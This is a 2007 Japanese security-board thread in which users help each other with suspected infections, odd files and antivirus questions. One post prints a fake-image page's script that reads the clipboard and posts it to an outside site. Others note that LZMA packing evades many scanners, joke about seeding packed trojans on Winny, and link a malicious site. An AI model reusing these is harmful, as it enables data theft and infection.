69 名前:名無しさん@お腹いっぱい。 [2007/05/05(土) 03:14:14 ]
質問です。データー等開く時にウイルスがあるかないか自動的にやってくれるソフトはありますか?

70 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/05(土) 14:31:19 ]
普通のアンチウイルスソフトはみんなやってることだが



71 名前:名無しさん@お腹いっぱい。 [2007/05/05(土) 22:07:55 ]
virustotal uploader
blog.hispasec.com/virustotal/23

これいいわ
インストすると右クリ→送る からvirustotalへ直行する
下手なウイルススキャンよりいいかも
しかしvt更に重くなるんだろなw

72 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/05(土) 22:18:17 ]
お前んちのパソコンも無駄に重くなるしな

73 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/05(土) 22:19:20 ]
入れなくていいよ

74 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/06(日) 02:37:03 ]
UPX3.00が出ていたのでちょっと確認してみた。
手持ちの既知の無圧縮トロイをオプション無しで固めて検知を確認した後
3.00(厳密にはベータの2.90)で新設されたLZMA(--lzmaオプション)で固めると
検知しなくなる製品がいっぱいある…。
Packerの識別と解凍はエンジン側に手入れしなきゃだめかもね。

75 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/06(日) 02:41:56 ]
解凍すれば検知するのだからあまりどうでもいい
VirusTotalに突っ込んでその結果が絶対だと思ってるアホどもを騙すには丁度良いが

76 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/06(日) 03:13:48 ]
パッカーとかステルスじゃねえし

77 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/06(日) 03:32:42 ]
>>75
VirusTotaはパッカー表示されるだろうがハゲ

78 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/06(日) 03:35:09 ]
>>77
馬鹿は発言しなくていいよ。

79 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/06(日) 04:22:46 ]
>>74
検知しないからと言って困る状況がほとんどない
未対応のPackerで固められた、その出所不明のファイル自体がすでに胡散臭い怪しい存在
そんなファイルがオンデマンドで検知されなかったからと言って、実行もされずにその後どうされるのやら

80 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/06(日) 05:51:10 ]
WinnyとかのUploadフォルダに突っ込んでしばらくニヤニヤできる



81 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/06(日) 06:15:27 ]
>>78

>>78

82 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/06(日) 20:41:23 ]
問題はマルウエア自身が毎回異なるUPX圧縮をして自身を変化させるタイプだな
まぁ、そんなのに感染したら素直にリカバリしてしまえばいいんだが

83 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/06(日) 21:24:33 ]
UPXの実行時解凍はファイルが作成されるわけではない
メモリ上で行われるから検知出来ないか出来ても後の祭り

84 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/06(日) 21:44:47 ]
ほとんど脅威に感じない

85 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/06(日) 22:12:25 ]
>>83
アホか
一度自分でやってみろ

86 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/07(月) 10:42:36 ]
>>83
ボンバー型のトロイはそうだが、大概のマルウエアは常駐ファイルを生成するから
それに反応するはず。それが>>82だったらアウトだけどな

87 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/07(月) 19:19:52 ]
ねむい氏
More優しく!

88 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/07(月) 21:38:51 ]
>>83
普通の使い方をしてたらEXEを踏むことはまずない
脆弱性だけ注意していたらいいと思う

89 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/07(月) 21:44:09 ]
お前は踏まないんだろうが
もらいもんのzipで踏んづけた > たすけて〜ドラえも〜ん なやつなんて結構いるだろが

90 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/07(月) 22:17:45 ]
>>89
あと割れの「エロゲ.exe」とか簡単に踏むやつ多いよなwwwwww。
やっぱ人につけいるならエロからだろ。



91 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/07(月) 22:18:45 ]
確かにIexplorer.exeのフォルダにUPX圧縮されたWS2_32.DLLのフック版を落とされたら終わりだな

92 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/07(月) 23:00:26 ]
もらいもんのウイルスってなんだよ
馬鹿と関係を持った自分の頭の悪さを嘆け

93 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/07(月) 23:14:26 ]
そういうのを見かけるって話だけど書き方が悪かったすかね

94 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/07(月) 23:16:35 ]
精神がウイルスに侵されてる奴はスルーしとけ

95 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/07(月) 23:20:44 ]
>>93
別にお前さんに言うとらん
そんな馬鹿の例など挙げるだけ無駄という話だ
八割方違法物だろ、むしろ引っかかって感染しろ

96 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/07(月) 23:27:54 ]
小学、中学ぐらいの年代はアプロダへのリンクで踏んじゃう
疑うことを知らないからな

97 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/08(火) 00:29:40 ]
>もらいもんのzipで踏んづけた > たすけて〜ドラえも〜ん なやつなんて結構いるだろが
結構いるかどうかは分からないが、いるかもしれないな。

だからなんだ。

98 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/08(火) 00:31:54 ]
感じるんだ

99 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/08(火) 00:34:30 ]
なんだそれ。 つか原田君いるかね

100 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/10(木) 17:06:07 ]

■新種ウイルス発生なのでご注意■

感染したPCをbot化すると思われる新種ウイルスが見つかってます。
これを検出できるアンチウイルス製品が完全に出揃っていないのでご注意ください。

無料アンチウイルスでは、BitDefender、AVG、AntiVir、Avastなどが検出できます。
有料アンチウイルスでは、McAfee、Kaspersky、F-Secureなどが検出できます。

NOD32やMicrosoft製アンチウイルスなどは、まだ検出できないので、特にご注意ください。


検出できる製品は赤字で検出名が表記されています(www.virustotal.com/による検証)。
vista.crap.jp/img/vi7878271194.png





101 名前: ◆N9P3SuvBPo mailto:sage [2007/05/10(木) 18:25:31 ]
スレ立て10日目でやっと100レスですか。
セキュ質スレでは大体10日前後で次スレですが…

まったり行きますか。

102 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/10(木) 18:40:37 ]
スレの特色が薄いんじゃない
>>1がイキナシもうテンプレだし
それ以降のテンプレはゴチャゴチャだし

103 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/10(木) 19:23:11 ]
テンプレもいまどきBlasterとかいらんだろ

104 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/10(木) 21:44:42 ]
*水曜日のWindowsUpdate更新プログラムについての不具合(>>335の追記)

427 名前:名無し~3.EXE[sage] 投稿日:2007/05/09(水) 22:29:25 ID:nDIeetqy
今回のパッチ、更新検索中に、WinXP+Office2003の環境で異様に重くなる場合あるそうな。
MSでも原因不明。svchostの奴で多少はましになるけど、責任は知らん、Officeを2007かXPにしろ
というお達しが、うちの会社で出た。

435 名前:名無し~3.EXE[sage] 投稿日:2007/05/10(木) 00:12:29 ID:FEz1XhvZ
WinXP+Office2003の環境で重くなる件について

うちの会社ではsvchostの奴をやって
Windows Updateのページに行って、左のメニューから「設定の変更」へ行き
「Windows Update をしない」みたいのを選んだら直った。
(適用したら見えなくなったので正確な名称じゃないかも)

システムのプロパティ内「自動更新を無効にする」にチェックして適用+OKクリック。
その後、WindowsUpdateのサイトで手動ダウンロード&インストールする。

ADSL回線や光回線でもこの現象が見られるという報告があがってます。
WinXP+Office2003の環境の人は気をつけてください。




*この文章を該当しそうなスレッドにコピペしてください。
よろしくお願いしますm(_ _)m

105 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/10(木) 22:20:17 ]
今頃言われてもなぁ
異様に重かったのは、やっぱ異常だったんか

106 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/10(木) 22:35:54 ]
Win板のUpdate失敗スレ見ろよ…

107 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/12(土) 00:16:23 ]
HPにgoogleを登録していたのですが、いつのまにかbiglobeに変わっていました。
ウィルスかなにかに感染してしまったのでしょうか・・・?

108 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/12(土) 02:18:01 ]
>>107
戻らないってことならNECサイトだか121だかに
対処方法が書かれていたと思う

109 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/12(土) 05:50:45 ]
【使用PC】 「SONY VAIO JX」
【使用OS】 「Windows XP (VAIO付属のもの)」
【Microsoft Update(MU)の状態】 「最新」 
【使用セキュリティソフトとバージョン】 「AVAST4.7 Home Edition」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」 
【スパイウェア対策ソフト】 「なし」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なし」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「なし」

【どんな症状が出るか】 「スピーカーから不定期に『くしゃっ・・・くしゃっ』という音が出ます。年に数回OSを入れなおしますが、いつの間にか音が出ています。どなたかお分かりの方いらっしゃいませんか?」

110 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/12(土) 06:25:39 ]
ウイルスとか関係ねーし。
ハード(ノイズ拾ってるなど)やドライバの問題だろ。
PC一般板のVAIOスレにでも行け。



111 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/12(土) 10:35:12 ]
VAIO(笑)

112 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/12(土) 12:44:11 ]
>>109
ああ、それはウィルスで間違いないよ。
すぐに病院行って抗生剤もらってこい。

113 名前:名無しさん@お腹いっぱい。 [2007/05/13(日) 02:01:18 ]
ime.nu/jettechcorp.com/link10627.jpg

これウイルスらしいんだけど、どんなウイルス?

114 名前:名無しさん@お腹いっぱい。 [2007/05/13(日) 03:07:16 ]
programfilesの中身がどんどん消されていくウイルスって最近報告ありました?
ウイルスバスターにもonecareにも引っかからないみたい。

115 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/13(日) 03:15:21 ]
>>114
whiter ならダウンロード板かな?

116 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/13(日) 04:15:36 ]
>>113
ime.nu外せ。鑑定は初級ネット板でどうぞ。

>>114
原田じゃねーの? >>13

117 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/13(日) 10:47:50 ]
pc11.2ch.net/test/read.cgi/sec/1126151563/273-278


118 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/13(日) 12:54:57 ]
>>114
ウイルスバスターとonecareを信用してるようじゃね・・・

119 名前:名無しさん@お腹いっぱい。 [2007/05/13(日) 15:28:43 ]
>>108
エスパー発見

120 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/15(火) 00:47:37 ]
失礼します。ちょっと質問させてください。
以前ウイルスに感染しました。
最新アップデートを行ったAVGとspybot両方でフルスキャンを通常状態とセーフモードで
かけたところとりあえず症状は出なくなりましたが、その頃から
インターネットエクスプローラーの
ツール→インターネットオプション→プライバシーの
cookieの設定を中などに設定してもしばらくすると勝手に低(すべてのcookieを受け入れる)
に変わってしまうようになりました。これはウイルスかスパイウェアの活動によるものでしょうか?
詳しい方のアドバイスお願いします。

以下補足ですが、
ウイルス感染中に
c\windowsフォルダ内に
*****.exe(5桁の数字)
eraseme_*****.exe(同上)
が複数増殖してAVGがたまにその一部を削除していく、
という症状が出ていました。
また、ダイアラー(delsim ダイアラ)が勝手に立ち上がったり
インターネットエクスプローラーが勝手に立ち上がり広告サイトが
勝手に開くこともありました。

OSはウィンドウズ2000、
使用しているウイルス対策ソフトはAVG、
スパイウェア対策はspybot-Search & Destroy
です。




121 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/15(火) 01:17:09 ]
>>120
スパイウェアの中にはブラウザの設定を落として、
次々と他のスパイウェアを呼び寄せる悪質なのがあります

122 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/15(火) 01:21:55 ]
2000でFW無しなのかねえ
とりあえず>>9ぐらいやれと。

123 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/15(火) 19:48:33 ]
こんばんは。
セキュリティソフトがIPを遮断しますか?と出たIPを調べたら
www.apnic.net/db/dbcopyright.html
から何回もアクセスされていました。
このサイトはどんな機関なのでしょうか?
わかる方、教えてください。

124 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/15(火) 19:51:31 ]
123ですが、表示されていたIPは125.54.39.204です。
よろしくお願いします。


125 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/15(火) 19:53:10 ]
KD125054039204.ppp-bb.dion.ne.jp

126 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/15(火) 20:11:41 ]
>>123
俺も以前そこから執拗なアクセスされたことある。
全部ルーター&FWが弾いたけど、何回もしつこいよな
うちはガード固いんだから、とっとと諦めろって言ってやりたい

なんなんだ?APNICって

127 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/15(火) 20:40:14 ]
もしかして釣り? それともボケ?

128 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/15(火) 21:09:47 ]
最近しばしばshare のdown フォルダにPrevHost というフォルダと、その中にindn.dat というファイルが自動で生成されることがあります。
ググっても、share の質問スレで聞いても回答が得られなかったのですが、何だか分かる方いましたら教えてください。

129 名前:123 mailto:sage [2007/05/15(火) 21:50:07 ]
>>127
IDが変わっていますが123です。
釣りでもないし、ボケているつもりもありません。。
さっきから同じような感じで6回もアタックされました。
こんな事は初めてで何かわかりません。
これは一体何なのか教えていただけますか?


130 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/15(火) 22:50:53 ]
APNICは君が逆引きで調べたWhoisそのもの
ちなみにそのIPはKDDI(DION) >>125



131 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/15(火) 23:00:47 ]
じゃあAPNICからアタックがあったポートは
別に開放しちゃっても問題ないんですか?

132 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/15(火) 23:03:47 ]
だからAPNICからアタックされてるんじゃないって
アッタクしてるのはどっかの感染者か踏み台にされてるPC

133 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/15(火) 23:08:19 ]
言い忘れたけどそういうアタックは日常茶飯事的にある
うちもルーターのログを見ればいっぱいあるから

134 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/15(火) 23:09:31 ]
なるほど。なんとなく理解できました。
安心しました。ありがとうございました。

135 名前:123 mailto:sage [2007/05/16(水) 00:20:14 ]
123です。
皆さん、丁寧に教えて下さってありがとうございました。
私も一安心しました。
ファイヤーウォールのソフトにも感謝して寝る事にします。
おやすみなさい。

136 名前:名無しさん@お腹いっぱい。 [2007/05/17(木) 14:35:38 ]
age

137 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/17(木) 17:40:01 ]
【使用OS】 「WindowsXP」
【使用セキュリティソフトとバージョン】 「NTTセキュリティ対策ツールver15」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新です」 
【スパイウェア対策ソフト】 「NTTセキュリティ対策ツールver15」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「しています」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか】
・TSPY_Backdoor
・検出リソース→ C:WINDOWS\system32\drivers
・検出対象→Zcsfzdjh.sys

検出して削除はしたのですが、トロイの木馬として検出されたので
まだ不安です。ぐぐってみてもバックドアは色んな種類が居て、どんな悪さをするのかよく解りません。
TSPY Bsckdoorで検索をかけてみましたが、見つけられませんでした。
対処はこれでよかったのか、それとどんな症状が出るのか教えて欲しいです。
PC初期化したほうがいいんですかね・・?

138 名前: ◆N9P3SuvBPo mailto:sage [2007/05/17(木) 18:06:34 ]
>137
不正ドライバか?
>Zcsfzdjh.sys

削除したんなら問題ないと思うけどな…

139 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/17(木) 20:52:46 ]
Zcsfzdjhでファイルとレジストリ検索しといたほうがいいんじゃね

140 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/18(金) 07:14:21 ]
ありがとうございます。
ファイル検索では引っかかりませんでした。
レジストリ検索っていうのは、ぐぐったら出てくるレジストリ検索のソフト使えばいいのかな?
あと、一応ネット通販とかのパスワードを変更しておいたほうがいいですかね?



141 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/18(金) 11:31:04 ]
>レジストリ検索
俺はこれを愛用してる
RegGlass
ttp://hp.vector.co.jp/authors/VA037892/regglass/regglass.html

142 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/18(金) 15:50:12 ]
只今ノートンスレにて炎上中の話題。

昨夜の定義ファイル更新でBackdoor検出。
Backdoor_Haxdoor: 「c:\WINDOWS\sysytem32\drivers\CO_Mon.sys」

「シマンテックのオンラインスキャンでウイルス検出を実行した際にダウンロードされるCO_Mon.sysで
Backdoor.Haxdoorが検出される。」
「シマンテックのオンラインスキャン以外にもCO_Mon.sysが入る経路があるのかも知れん」

感染経路は?本当にBackdoor?等、いまだに詳細は不明。

【ノートン】インターネットセキュリティ Ver.113【2007】
pc11.2ch.net/test/read.cgi/sec/1178603986/486


143 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/18(金) 16:09:53 ]
騒いでるの一人だけじゃん…。
普通にどこかで踏んだんだろ。

144 名前: ◆N9P3SuvBPo mailto:sage [2007/05/18(金) 18:34:13 ]
>142
誤検出だったという展開になってるようだけど。

c:\windows\ntbtlog.txtに
「Loaded driver \SystemRoot\System32\Drivers\CO_Mon.sys」が
存在しないか確認を。無いと思うけどね。

145 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/18(金) 20:18:02 ]
ほんとにhaxdoorだったらえらいこっちゃ

146 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/18(金) 20:38:30 ]
Rootkitだもんな

147 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/18(金) 21:26:22 ]
>144
そのc:\windows\ntbtlog.txtってなんなの?
spybotがいつも反応するんでセーフモードで消したけど、すぐ復活するし。
頭にきてOS再インスコしたけどたかまた出てくるんだが。

148 名前: ◆N9P3SuvBPo mailto:sage [2007/05/18(金) 21:32:10 ]
>147
ブートのログ
起動時に読み込まれた(または読み込まれなかった)ドライバが表示される

F8起動オプションの、セーフモードで起動した時や、
「ブートのログ作成を有効にする」を選んで起動した時に作成される。
(一旦作成してしまうと、起動する度に内容が追記されてサイズが増えて行く)


149 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/19(土) 13:25:36 ]
すまんタスクマネージャーにtgui.exeってのとtgsvc.exeっていうのが急に出現してメモリ使いまくってるんだがこれってなんなのかわかる奴いない?
最近ウィルス踏んだばっかりだから気になるんだが…

150 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/19(土) 13:32:12 ]
>>141
ありがとうございました。
何も引っかかりませんでした。

これで一安心なのかな・・?
アドバイスくれた皆様、ありがとうございました〜





151 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/19(土) 14:31:03 ]
>>149
検索すらしないのかよ

152 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/19(土) 15:07:48 ]
>>151
だからみんなスルーしてるだろ

153 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/19(土) 15:37:55 ]
了解。

154 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/19(土) 15:51:10 ]
    人
 〜( ○) 
   (_ ゚T゚  
   ゚ ゚̄


155 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 12:58:56 ]
ttp://omanchin.com/railway/omanchin.cgi/img/img2006070189.jpg

これってどういうものですか?
ノートンが反応するそうです。
解説お願いします。


156 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 13:07:36 ]
>>155
クリップボードのデータを盗まれたお・・おっおっおっ

157 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 13:07:42 ]
>>155
これ、JPGじゃねーよ。

158 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 13:11:52 ]
>>155
※ clipboardData.getDataが使われているようです。
以後こちらへどうぞ
勇気がなくて踏めない人のための鑑定スレPart14
pc11.2ch.net/test/read.cgi/hack/1177503872/

159 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 13:16:14 ]
DR,webもブラクラチェックも大丈夫そうだが、
チキンな俺は踏まない。

つか、>>155危険なリンク貼るな。スレ違いだボケ
専ブラで画像自動表示してる人だっているんだから、
少しでも危険なリンク貼るならht位まで消してから貼れ。今度やったら通報する。

160 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 13:25:48 ]
>>155
※ clipboardData.getDataが使われているようです。




161 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 13:43:03 ]
<form method="post" name="bbs" action="omanchin.com/railway/omanchin.cgi">
<input type="hidden" name="paste" value="">
<INPUT type="hidden" name="k" value="あ">
<INPUT type="hidden" name="chktime" value="1179759460">
<INPUT type="hidden" name="title" value="">
</form>
<script type="text/javascript">
<!--
document.bbs.paste.value = clipboardData.getData("Text");
document.bbs.submit ();
// -->
</script>

クリップボードのデータを送信しちゃいますよ〜って。

162 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 13:49:18 ]
「このWebページがクリップボードへアクセスするのを許可しますか?」→「許可しない」
さすがIE7、なんともないぜ。

163 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 13:51:05 ]
クリップボードのデータ送信されたら
あんなエロイ事や、こんなエロイ事を検索したのがバレちゃうじゃんか!!111!!!1

164 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 13:52:15 ]
ウイルスコードをクリップボードにコピーして踏めばいいんじゃね?

165 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 13:55:06 ]
>>164


166 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 13:56:34 ]
>>159
馬鹿ですか?
聞くまでもなく馬鹿ですよね

167 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 14:04:03 ]
clipboardData.getDataって取得できるサイズに制限無いの?

50MBのテキストコピーして踏んでみたが、ちゃんと送信されてるっぽい。

168 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 14:07:36 ]
あ、違った。5MBだった。

169 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 14:12:45 ]
制限無いんじゃね?
メモリ食いつぶすまで行けると思うが、先にクリップボードが死ぬかと。

170 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 15:33:31 ]
>>159
何でお前がこのスレにいるのか分からない。
チキンで踏めもしないのに、此処でグダグダ言うお前って何様?



171 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 15:35:59 ]
> 専ブラで画像自動表示してる人だっているんだから、

こんな人もセキュやってるんだと思うと笑えてくるよな
pink板へ逝けよ

172 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 17:16:36 ]
いきなりブラクラもどき貼る馬鹿よりマシじゃねw

173 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 17:19:41 ]
>>155
通報しますた

174 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 17:35:43 ]
>>155
じゃあ俺も通報しとくわ

175 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 17:39:40 ]
じゃあ有名な奴を直リンで
www2.strangeworld.org/uedakana/

176 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 17:42:32 ]
アク禁になるぞ

177 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 18:26:01 ]
アク禁になるだけならまだいいけど、
2ちゃんからプロバイダに連絡行って強制解約になったやつもいるからな

匿名でID出ないからって、あんまり調子に乗ってウイルス貼るのはやめたほうがいい

178 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 18:30:33 ]
ゆとり君はほっとけ

179 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 18:44:33 ]
とりあえず>>175は通報してアク禁にしちゃいましょう^^

180 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 19:14:27 ]
>>155
ttp://omanchin.com/railway/bbs.cgi?c=900 ここの点呼みたいだけどな。



181 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/22(火) 19:27:35 ]
まぁ、なんでもいいけど、訳分からんスレ違いなものを貼るな禿って事だな

182 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/23(水) 23:15:26 ]
愚問かも知れないが教示頂けませんか?
1、LANネットワークを共有するウィルス・スパイウェアの存在の有無
2、A─B環境で、AにあるウィルスをBから起動させると感染するのはA?B?両方?

183 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/23(水) 23:40:41 ]
>>182

1 : 共有の意味がよくわからないけど、以前問題になったMSBlustは、ローカルエリア
内のほかのコンピュータに感染する動作をしていた。また、共有フォルダを破壊、改変する
タイプもある。

2 : なぜAにウイルスがあるのかが問題。Aがすでにウイルスに感染している可能性も
ある。そうでなければ、Bから起動させた場合、通常感染するのはBだけ。ただし、Aにい
ファイアーウォールソフトがなければ、場合によってはその後Aに感染するリスクはある。
上に書いたような共有フォルダを破壊するようなタイプなら被害はBにも及ぶかもしれない。

いずれにしてもウイルスの挙動は千差万別で、一般論は通用しないので注意してほしい。

184 名前:182 mailto:sage [2007/05/23(水) 23:54:37 ]
>>183
レス感謝です 説明が下手で申し訳ないですが
一応把握しました
1、はAが感染していたらBも感染するか聞きたかったんです
2、は「千差万別」=「する物もある」で理解しました

>なぜAにウイルスがあるのかが問題
ウィルスと確定した訳では無いのですが
単に「不明なファイル」があると言うことです

185 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/24(木) 12:00:02 ]
JAVAアプレットを立ち上げるとIEが原因でkernel32.dllにエラーが・・・
とでて、強制終了させられます。
avastのフリーソフトでウイルス駆除したのですが改善されません。
システムのなかにjacbgage.dllという不明なものもありました。
どうしたらいいでしょうか・・・・

186 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/24(木) 23:09:22 ]
countfuyashi0gokun.blog50.fc2.com/blog-entry-19.html

すみません。このページにウィルスめいたものがあるか調べることは可能でしょうか??
不安で夜も眠れないのでよろしくお願いいたします。

187 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/24(木) 23:18:40 ]
>>186
セキュリティ初心者質問スレッドpart89
pc11.2ch.net/test/read.cgi/sec/1179508837/469
469 名前:名無しさん@お腹いっぱい。[] 投稿日:2007/05/24(木) 23:02:57
ttp://countfuyashi0gokun.blog50.fc2.com/blog-entry-19.html
すみません。このページにウィルスめいたものがあるか調べることは可能でしょうか??
不安で夜も眠れないのでよろしくお願いいたします。


誘導されただろ 貼ってもらわないと行けないなら踏め

勇気がなくて踏めない人のための鑑定スレPart14
pc11.2ch.net/test/read.cgi/hack/1177503872/

188 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/24(木) 23:23:04 ]
541 名前:名無しさん@お腹いっぱい。[] 投稿日:2007/05/24(木) 23:06:48
ttp://countfuyashi0gokun.blog50.fc2.com/blog-entry-19.html

わけのわからないページを踏んでしまいました。このページ内に何か問題はありますでしょうか?
ワープとかいう所がひたすら重かったです・・・。
よろしくお願いいたします。

どれだけマルチするつもりか知らんけど
フラッシュ再生するだけだから勝手に踏んだらいい

189 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/24(木) 23:28:07 ]
セキュ板に常駐してる人間をなめてんな
マルチしてもばれないと思ったら大間違いだつうの

190 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/25(金) 01:16:46 ]
新種ルートキット情報
pc11.2ch.net/test/read.cgi/sec/1087037111/410



191 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/25(金) 03:17:13 ]
AV-Test.orgという専門機関のアンチウイルス検知力テスト結果(2007年05月22日)
AV-Test.org Reports Stats from Antivirus Roundup
ttp://www.pcmag.com/article2/0,1895,2135053,00.asp

01位)WebWasher  99.83%
02位)AVK 2007   99.56%
03位)AntiVir     99.42%
04位)F-Secure.   97.93%
05位)Symantec   97.77%
06位)Kaspersky   97.64%
07位)Fortinet.    97.06%
08位)Avast!.     96.32%
09位)AVG.      96.15%
10位)Rising      96.02%
11位)BitDefender  95.68%
12位)Norman..    94.66%
13位)Ikarus..     92.54%
14位)Panda.     92.09%
15位)Trend Micro.. 90.97%
16位)Nod32.     88.32%

192 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/25(金) 16:30:13 ]
厨な質問なんだがyoutubeとかニコニコとかの動画サイトでウィルスとかあんの?

193 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/25(金) 16:36:47 ]
>>192
それが人に物をたずねる態度か
死ねクズ蟲
ゴミ収集車に巻き込まれて 頭粉砕されて死ね

194 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/25(金) 19:26:51 ]
まさにそうなって欲しいアホがレスしてるのがなんとも言えないねぇ…

195 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/25(金) 19:28:26 ]
あるある

196 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/25(金) 19:29:13 ]
ねぇねぇ

197 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/26(土) 00:58:03 ]
※アンチウイルスNOD32の脆弱性情報
pc11.2ch.net/test/read.cgi/sec/1167829054/540

198 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/27(日) 12:13:05 ]
マルウェア注意

マカフィー・ユーザーのブログに、
